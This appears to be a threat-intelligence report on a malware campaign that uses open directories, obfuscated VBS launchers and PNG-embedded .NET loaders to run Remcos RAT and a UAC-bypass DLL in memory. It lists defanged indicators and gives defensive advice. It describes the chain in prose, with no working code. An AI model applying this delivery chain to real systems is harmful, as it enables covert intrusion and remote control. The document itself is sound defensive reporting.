Sophisticated Malware Campaign Exploits Open Directories to Deploy Obfuscated Loaders and Remote Access Trojans
In early 2026, cybersecurity researchers uncovered a complex malware campaign that leverages open directories to distribute obfuscated Visual Basic Script (VBS) files, PNG-embedded loaders, and remote access trojans (RATs). This multi-stage attack operates entirely in memory, leaving minimal traces on the infected systems.
Discovery and Initial Indicators
The campaign came to light when a suspicious VBS file named `Name_File.vbs` was detected in the `\Users\Public\Downloads\` directory of a compromised endpoint. SentinelOne’s endpoint protection intercepted and quarantined the file before execution. Upon analysis, the VBS file contained a Base64-encoded PowerShell command designed to fetch additional components from a remote server.
Investigation and Infrastructure Analysis
Further investigation by LevelBlue’s SpiderLabs Cyber Threat Intelligence team revealed that this incident was part of a larger, organized operation. The attackers utilized an openly accessible domain, `news4me[.]xyz`, hosting multiple obfuscated VBS files linked to various malware payloads, including XWorm variants and Remcos RAT stored as text files. The infrastructure featured open directories such as `/coupon/`, `/protector/`, and `/invoice/`, each serving distinct roles in the malware distribution process.
Infection Mechanism: From VBS to In-Memory RAT Execution
The attack initiates with a VBS file acting as a launcher, devoid of active malicious code. This script employs Unicode obfuscation to conceal a Base64-encoded PowerShell command. When executed, the PowerShell command enforces TLS 1.2 and uses the `Net.WebClient` class to download a PNG image named `MSI_PRO_with_b64.png` from an Internet Archive URL.
This PNG file contains an embedded .NET assembly, PhantomVAI, hidden between custom `BaseStart` and `BaseEnd` markers. PhantomVAI loads directly into memory via `Reflection.Assembly::Load`, executing entirely in RAM to evade file-based security measures. Once active, PhantomVAI retrieves two additional payloads:
1. An obfuscated string from `news4me[.]xyz/protector/johnremcos.txt`, which decodes into a functional instance of Remcos RAT, granting the attacker persistent remote access.
2. A PNG file named `uac.png` containing a UAC Bypass DLL, facilitating elevated privileges on the compromised system.
Implications and Recommendations
This campaign underscores the evolving sophistication of malware delivery methods, particularly the use of open directories and in-memory execution to bypass traditional security defenses. Organizations are advised to implement the following measures:
– Enhanced Endpoint Detection and Response (EDR): Deploy advanced EDR solutions capable of identifying and mitigating fileless malware threats.
– Regular Security Audits: Conduct thorough audits of network traffic and endpoint activities to detect anomalies indicative of such sophisticated attacks.
– User Education: Train employees to recognize and report suspicious files and activities, reducing the risk of inadvertent execution of malicious scripts.
By adopting these proactive strategies, organizations can bolster their defenses against increasingly complex malware campaigns that exploit open directories and in-memory execution techniques.
